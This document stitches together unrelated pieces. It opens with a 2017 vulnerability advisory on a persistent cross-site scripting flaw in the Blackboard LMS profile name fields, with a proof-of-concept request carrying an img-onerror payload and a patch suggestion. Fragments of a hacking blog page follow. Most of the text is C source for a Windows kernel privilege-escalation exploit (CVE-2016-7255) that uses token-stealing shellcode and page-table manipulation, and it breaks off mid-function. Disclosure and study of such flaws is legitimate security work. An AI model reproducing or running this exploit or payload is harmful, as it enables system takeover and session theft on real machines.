Document Title:
===============
Blackboard LMS 9.1 SP14 - (Profile) Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1900
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
1900
Common Vulnerability Scoring System:
====================================
4.2
Product & Service Introduction:
===============================
Blackboard Learn (previously the Blackboard Learning Management System), is a virtual learning environment and course management system
developed by Blackboard Inc. It is Web-based server software which features course management, customizable open architecture, and scalable
design that allows integration with student information systems and authentication protocols. It may be installed on local servers or hosted
by Blackboard ASP Solutions. Its main purposes are to add online elements to courses traditionally delivered face-to-face and to develop
completely online courses with few or no face-to-face meetings.
(Copy of the Homepage: http://www.blackboard.com/learning-management-system/blackboard-learn.aspx )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side input validation vulnerability in the official Blackboard LMS 9.1 SP14.
Vulnerability Disclosure Timeline:
==================================
2017-01-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
BlackBoard Inc.
Product: Blackboard LMS - Content Management System 9.1 SP 14
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in Blackboard LMS official web-application.
Remote attackers are able to inject malicious code into profile information module, the vulnerability is located in
the first name,last name of user profile, the vulnerable fields in the module (userVO.firstName & userVO.lastName).
The issue allows an attacker to inject own malicious java script codes to the vulnerable modules context. The execution
of the vulnerability occurs in Blackboard LMS main panel & user management module. Due to our investigation we discovered
that users with low privileged access are able to to inject their own java code to compromise other moderator or admin
session credentials. The request method to inject is POST and the attack vector of the issue is persistent. The execute
occurs each time an account visits the profile page of the attacking user account.
The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.2
Exploitation of the web vulnerability requires a low privileged user account with restricted access and low user interaction.
Successful exploitation of the vulnerability results in persistent phishing mails, session hijacking, persistent external
redirect to malicious sources and application-side manipulation of affected or connected module context.
Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers with low privileged web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. User register in the blackboard LMS course as student .
2. User goes to profile information section and inject the code persistent payload > into the firstname or lastname input fields
Note: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
3. User submits data and saves it via POST method request with out secure parse by the web validation
4. The execution of vulnerability occurs in the user management:
https://b-lms.localhost:8000/webapps/Bb-sites-enrollment-manager-BBLEARN/enrollmentManager.form?course_id=_431252_1
5. Successfully reproduce the application-side web validation vulnerability!
--- PoC Session Logs [POST] ---
POST /webapps/Bb-sites-user-profile-BBLEARN/profile.form HTTP/1.1
Host: b-lms.localhost:8000
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Cookie: JSESSIONID=285EAF6ED95FF4574CADF4FF90F218B1; __utma=154552106.1787260759.1470597563.1470597563.1470652392.2;
__utmz=154552106.1470597563.1.1.utmcsr=vulnlab.coursesites.com|utmccn=(referral)|utmcmd=referral|utmcct=/; COOKIE_CONSENT_ACCEPTED=true;
NSC_106969_wjq_69.196.229.208.hspvq=ffffffff090d159545525d5f4f58455e445a4a42378b; session_id=153E1080C32EF7E9393910EC45598887;
s_session_id=FCCF148598E6531BC4167D5C3B8A2949; JSESSIONID=C866524B3CA437DF8E0AC184746DBD36; __utmb=154552106.26.9.1470653164713; __utmc=154552106; __utmt=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 605
userVO.firstName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.lastName=%3Cimg+src%3Dx+onerror%3Dprompt%284%29%3E&userVO.user.educationLevel=
Not+Disclosed&userVO.user.gender=Not+Disclosed&birthDate_datetime=&pickdate=&pickname=&birthDate_date=&userVO.user.studentId=&userType=HE_STUDENT
&userVO.user.emailAddress=sec%40secteach.me&userVO.user.street1=&userVO.user.city=&userVO.user.state=&userVO.user.zipCode=&userVO.user.country=AF
&userVO.user.mobilePhone=&userVO.user.homePhone1=&userVO.user.webPage=&userVO.userProfile.institutionGuid=User_Instr_2015-02-22_19%3A31%3A21.304
&userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit
-
RESPONSE
HTTP/1.1 200 OK
Date: Mon, 08 Aug 2016 11:06:31 GMT
Server: Apache/1.3.42 (Unix) mod_ssl/2.8.31 OpenSSL/1.0.1g mod_jk/1.2.37
X-Blackboard-appserver: fgprd-106969-156642-app006.mhint
P3P: CP="CAO PSA OUR"
X-Blackboard-product: Blackboard Learn ™ 9.1.140152.0
Set-Cookie: session_id=153E1080C32EF7E9393910EC45598887; Path=/; HttpOnly
Set-Cookie: s_session_id=FCCF148598E6531BC4167D5C3B8A2949; Path=/; Secure; HttpOnly
Pragma: no-cache
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Fri, 18 Jul 2014 19:02:32 GMT
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html;charset=UTF-8
Reference(s):
https://b-lms.localhost:8000/
https://b-lms.localhost:8000/webapps/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/
https://b-lms.localhost:8000/webapps/Bb-sites-user-profile-BBLEARN/profile.form
Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse or encode of the vulnerable firstname and lastname input fields.
Disallow the usage of special chars and filter the entries by an escape. Parse the output context in the profile.form to
prevent application-side executions.
Security Risk:
==============
The security risk of the application-side input validation vulnerabilities in the user profile section is estimated as medium. (CVSS 4.2)
Credits & Authors:
==================
Vulnerability Lab [Research Team] - Lawrence Amer (http://www.vulnerability-lab.com/show.php?user=Lawrence%20Amer)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863293101
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
Source: https://ricklarabee.blogspot.com/2017/01/virtual-memory-page-tables-and-one-bit.html
Binary: https://github.com/rlarabee/exploits/raw/8b9eb646516d7f022a010f28018209f331c28975/cve-2016-7255/compiled/cve-2016-7255.exe
Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41015.exe
*/
// ricklarabee.blogspot.com
//This program is free software; you can redistribute it and/or
//modify it under the terms of the GNU General Public License
//as published by the Free Software Foundation.
//This program is distributed in the hope that it will be useful,
//but WITHOUT ANY WARRANTY; without even the implied warranty of
//MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.See the
//GNU General Public License for more details.
//You should have received a copy of the GNU General Public License
//along with this program; if not, write to the Free Software
//Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
// Credits: enrique.nissim@IOActive.com: https://github.com/IOActive/I-know-where-your-page-lives/tree/master/code/CVE-2016-7255
// PoC from https://github.com/tinysec/public/tree/master/CVE-2016-7255
#include <windows.h>
#include <wchar.h>
#include <stdlib.h>
#include <stdio.h>
#pragma comment(lib,"ntdll.lib")
#pragma comment(lib,"user32.lib")
#pragma comment(lib, "advapi32")
UINT64 PML4_BASE;
UINT PML4_SELF_REF_INDEX;
UINT64 PML4_SELF_REF = 0xFFFFF6FB7DBEDF68;
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#define STATUS_UNSUCCESSFUL ((NTSTATUS)0xC0000001L)
#define GET_INDEX(va) ( ((va >> 39) & 0x1ff ))
////////////////////////////////////////////////////////
// Define Data Types
////////////////////////////////////////////////////////
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
PVOID Unknown1;
PVOID Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemModuleInformation = 11,
SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS (WINAPI *NtQuerySystemInformation_t)(IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource,
OUT PULONG Interval);
NtQuerySystemInformation_t NtQuerySystemInformation;
NtQueryIntervalProfile_t NtQueryIntervalProfile;
char shellcode[] = {
//0xcc,
0xfa, // CLI
0x9c, // PUSHFQ
0x48, 0xb8, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RAX, Original Pointer
0x50, // PUSH RAX
0x51, // PUSH RCX
0x48, 0xb9, 0x90, 0x90, 0x90 ,0x90 ,0x90, 0x90, 0x90, 0x90, // MOV RCX, [OverwriteAddr+OverwriteOffset]
0x48, 0x89, 0x01, // MOV QWORD PTR [RCX], RAX
0xb9, 0x90, 0x90, 0x90, 0x90, // MOV ECX, PID
0x53, // PUSH RBX
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, // MOV RAX,QWORD PTR gs:0x188
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, // MOV RAX,QWORD PTR [RAX+0xb8] EPROCESS
0x48, 0x8d, 0x80, 0x90, 0x90, 0x00, 0x00, // LEA RAX,[RAX+0xActiveProcessLinkOffset]
//<tag>
0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4
0x75, 0xf3, // JNE <tag>
0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM
0x53, // PUSH RBX
//<tag2>
0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
0x39, 0xcb, // CMP EBX, ECX // our PID
0x75, 0xf5, // JNE <tag2>
0x5b, // POP RBX
0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX
0x5b, // POP RBX
0x59, // POP RCX
0x58, // POP RAX
0x9d, // POPFQ
0xfb, // STI
0xff, 0xe0 // JMP RAX
};
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
CHAR* pszDbgBuff = NULL;
va_list VaList = NULL;
ULONG ulRet = 0;
do
{
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));
if (NULL == pszDbgBuff)
{
break;
}
RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));
va_start(VaList, Format);
_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);
OutputDebugStringA(pszDbgBuff);
va_end(VaList);
} while (FALSE);
if (NULL != pszDbgBuff)
{
HeapFree(GetProcessHeap(), 0, pszDbgBuff);
pszDbgBuff = NULL;
}
return ulRet;
}
int _sim_key_down(WORD wKey)
{
INPUT stInput = { 0 };
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = 0;
SendInput(1, &stInput, sizeof(stInput));
} while (FALSE);
return 0;
}
int _sim_key_up(WORD wKey)
{
INPUT stInput = { 0 };
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &stInput, sizeof(stInput));
} while (FALSE);
return 0;
}
int _sim_alt_shift_esc()
{
int i = 0;
do
{
_sim_key_down(VK_MENU);
_sim_key_down(VK_SHIFT);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_up(VK_MENU);
_sim_key_up(VK_SHIFT);
} while (FALSE);
return 0;
}
int _sim_alt_shift_tab(int nCount)
{
int i = 0;
HWND hWnd = NULL;
int nFinalRet = -1;
do
{
_sim_key_down(VK_MENU);
_sim_key_down(VK_SHIFT);
for (i = 0; i < nCount; i++)
{
_sim_key_down(VK_TAB);
_sim_key_up(VK_TAB);
Sleep(1000);
}
_sim_key_up(VK_MENU);
_sim_key_up(VK_SHIFT);
} while (FALSE);
return nFinalRet;
}
int _sim_alt_esc(int count)
{
int i = 0;
for (i = 0; i<count; i++)
{
_sim_key_down(VK_MENU);
//_sim_key_down(VK_SHIFT);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_up(VK_MENU);
//_sim_key_up(VK_SHIFT);
}
return 0;
}
int or_address_value_4(__in void* pAddress)
{
WNDCLASSEXW stWC = { 0 };
HWND hWndParent = NULL;
HWND hWndChild = NULL;
WCHAR* pszClassName = L"cve-2016-7255";
WCHAR* pszTitleName = L"cve-2016-7255";
void* pId = NULL;
MSG stMsg = { 0 };
UINT64 value = 0;
do
{
stWC.cbSize = sizeof(stWC);
stWC.lpfnWndProc = DefWindowProcW;
stWC.lpszClassName = pszClassName;
if (0 == RegisterClassExW(&stWC))
{
break;
}
hWndParent = CreateWindowExW(
0,
pszClassName,
NULL,
WS_OVERLAPPEDWINDOW | WS_VISIBLE,
0,
0,
360,
360,
NULL,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndParent)
{
break;
}
hWndChild = CreateWindowExW(
0,
pszClassName,
pszTitleName,
WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
0,
0,
160,
160,
hWndParent,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndChild)
{
break;
}
#ifdef _WIN64
pId = ((UCHAR*)pAddress - 0x28);
#else
pId = ((UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64
SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);
DbgPrint("hWndChild = 0x%p\n", hWndChild);
ShowWindow(hWndParent, SW_SHOWNORMAL);
SetParent(hWndChild, GetDesktopWindow());
SetForegroundWindow(hWndChild);
_sim_alt_shift_tab(4);
SwitchToThisWindow(hWndChild, TRUE);
_sim_alt_shift_esc();
while (GetMessage(&stMsg, NULL, 0, 0)) {
SetFocus(hWndParent);
_sim_alt_esc(20);
SetFocus(hWndChild);
_sim_alt_esc(20);
TranslateMessage(&stMsg);
DispatchMessage(&stMsg);
if (value != 0) {
break;
}
__try {
value = *(UINT64 *)PML4_SELF_REF;
if ((value & 0x67) == 0x67) {
printf("Value Self Ref = %llx\n", value);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
continue;
}
}
} while (FALSE);
if (NULL != hWndParent)
{
DestroyWindow(hWndParent);
hWndParent = NULL;
}
if (NULL != hWndChild)
{
DestroyWindow(hWndChild);
hWndChild = NULL;
}
UnregisterClassW(pszClassName, GetModuleHandleW(NULL));
return 0;
}
UINT64 get_pxe_address(UINT64 address) {
UINT entry = PML4_SELF_REF_INDEX;
UINT64 result = address >> 9;
UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);
UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;
result = result | lower_boundary;
result = result & upper_boundary;
return result;
}
UINT64 look_free_entry_pml4(void) {
// Looks for a free pml4e in the last 0x100 bytes of the PML4
int offset = 0xF00;
UINT64 pml4_search = PML4_BASE + offset;
while (offset < 0xFF8)
{
if ((*(PVOID *)pml4_search) == 0x0)
{
// This is a NULL (free) entry
break;
}
offset += 8;
pml4_search = PML4_BASE + offset;
}
return pml4_search;
}
UINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {
UINT64 index = (spurious_offset & 0xFFF) / 8;
UINT64 result = (
((UINT64)0xFFFF << 48) |
((UINT64)PML4_SELF_REF_INDEX << 39) |
((UINT64)PML4_SELF_REF_INDEX << 30) |
((UINT64)PML4_SELF_REF_INDEX << 21) |
(index << 12)
);
return result;
}
UINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {
/*
1: kd> !pte ffffffff`ffd00000
VA ffffffffffd00000
PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800
contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963
pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V
*/
UINT64 pte = get_pxe_address(virtual_address);
int pte_offset = pte & 0xFFF;
//printf("PTE: %llx, %x\n", pte, pte_offset);
UINT64 pde = get_pxe_address(pte);
int pde_offset = pde & 0xFFF;
//printf("PDE: %llx, %x\n", pde, pde_offset);
UINT64 pdpte = get_pxe_address(pde);
int pdpte_offset = pdpte & 0xFFF;
//printf("PDPTE: %llx,%x\n", pdpte, pdpte_offset);
UINT64 pml4e = get_pxe_address(pdpte);
int pml4e_offset = pml4e & 0xFFF;
//printf("PML4E: %llx\n", pml4e, pml4e_offset);
UINT64 spurious_offset = look_free_entry_pml4();
printf("[+] Selected spurious PML4E: %llx\n", spurious_offset);
UINT64 f_e_pml4 = spurious_offset;
UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);
printf("[+] Spurious PT: %llx\n", spurious_pt);
printf("--------------------------------------------------\n\n");
//Read the physical address of pml4e
UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);
printf("[+] Content pml4e %llx: %llx\n", pml4e, pml4e_pfn);
// Change the PxE
pml4e_pfn = pml4e_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PML4e) %llx: %llx\n",f_e_pml4, pml4e_pfn);
*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pdpte
UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);
printf("[+] Content pdpte %llx: %llx\n", pdpte, pdpte_pfn);
// Change the PxE
pdpte_pfn = pdpte_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PDPTE) %llx: %llx\n", spurious_offset, pdpte_pfn);
*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pde
UINT64 pde_addr = spurious_pt + pde_offset;
UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);
printf("[+] Content pdpe %llx: %llx\n", pde, pde_pfn);
// Change the PxE
pde_pfn = pde_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PDE) %llx: %llx\n", spurious_offset, pde_pfn);
*((PVOID *)spurious_offset) = (PVOID)pde_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pte
UINT64 pte_addr = spurious_pt + pte_offset;
UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);
printf("[+] Content pte %llx: %llx\n", pte, pte_pfn);
// Change the PxE
pte_pfn = pte_pfn | 0x67; // Set U/S
pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX
if (patch_original) {
printf("*** Patching the original location to enable NX...\n");
*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;
}
printf("[+] Patching the Spurious Offset (PTE) %llx: %llx\n", spurious_offset, pte_pfn);
*((PVOID *)spurious_offset) = (PVOID)pte_pfn;
Sleep(0x1); // Sleep for TLB refresh;
printf("\n\n");
return spurious_pt;
}
UINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {
printf("[*] Getting Overwrite pointer: %llx\n", target_address);
UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);
OverwriteAddress += (target_address & 0xFFF);
printf("OverwriteAddress: %llx\n", OverwriteAddress);
return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));
}
void overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {
UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);
OverwriteTarget += (target_address & 0xFFF);
UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;
printf("Patch OverwriteTarget: %llx with %llx\n", target, hook_address);
*(PVOID *)target = (PVOID)hook_address;
}
UINT64 store_shellcode_in_hal(void) {
//// Finally store the shellcode on the HAL
UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;
UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);
printf("HAL address: %llx\n", hal_heap);
// 0xffffffffffd00d50 this is a good offset to store shellcode
// 0xfff - 0xd50 = 0x2af space
memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));
return 0xffffffffffd00d50;
}
UINT64 GetHalDispatchTable() {
PCHAR KernelImage;
SIZE_T ReturnLength;
HMODULE hNtDll = NULL;
UINT64 HalDispatchTable;
HMODULE hKernelInUserMode = NULL;
PVOID KernelBaseAddressInKernelMode;
NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll) {
printf("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
printf("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);
// Allocate the Heap chunk
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
ReturnLength);
if (!pSystemModuleInformation) {
printf("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation,
pSystemModuleInformation,
ReturnLength,
&ReturnLength);
if (NtStatus != STATUS_SUCCESS) {
printf("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;
KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1;
printf("\t\t\t[+] Loaded Kernel: %s\n", KernelImage);
printf("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA(KernelImage);
if (!hKernelInUserMode) {
printf("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
// This is still in user mode
HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, "HalDispatchTable");
if (!HalDispatchTable) {
printf("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
else {
HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;
// Here we get the address of HapDispatchTable in Kernel mode
HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);
printf("\t\t\t[+] HalDispatchTable: 0x%llx\n", HalDispatchTable);
}
HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);
if (hNtDll) {
FreeLibrary(hNtDll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hNtDll = NULL;
hKernelInUserMode = NULL;
pSystemModuleInformation = NULL;
return HalDispatchTable;
}
int __cdecl main(int argc, char** argv)
{
TCHAR pre_username[256];
TCHAR post_username[256];
DWORD size = 256;
ULONG Interval = 0;
HMODULE hNtDll = NULL;
UINT retval;
UINT64 overwrite_address;
int overwrite_offset;
// define operating system version specific variables
unsigned char sc_KPROCESS;
unsigned int sc_TOKEN;
unsigned int sc_APLINKS;
int osversion;
if (argc != 2) {
printf("Please enter an OS version\n");
printf("The following OS'es are supported:\n");
printf("\t[*] 7 - Windows 7\n");
printf("\t[*] 81 - Windows 8.1\n");
printf("\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\n");
printf("\t[*] 12 - Windows 2012 R2\n");
printf("\n");
printf("\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\n");
return -1;
}
osversion = _strtoui64(argv[1], NULL, 10);
if(osversion == 7)
{
// the target machine's OS is Windows 7 SP1
printf(" [+] Windows 7 SP1\n");
sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)
sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = GetHalDispatchTable(); // HalDispatchTable
overwrite_offset = 0x8; // QueryIntervalProfile
}
else if(osversion == 81)
{
// the target machine's OS is Windows 8.1
printf(" [+] Windows 8.1\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
else if(osversion == 10)
{
// the target machine's OS is Windows 10 prior to build 14393
printf(" [+] Windows 10\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
else if(osversion == 12)
{
// the target machine's OS is Windows 2012 R2
printf(" [+] Windows 2012 R2\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
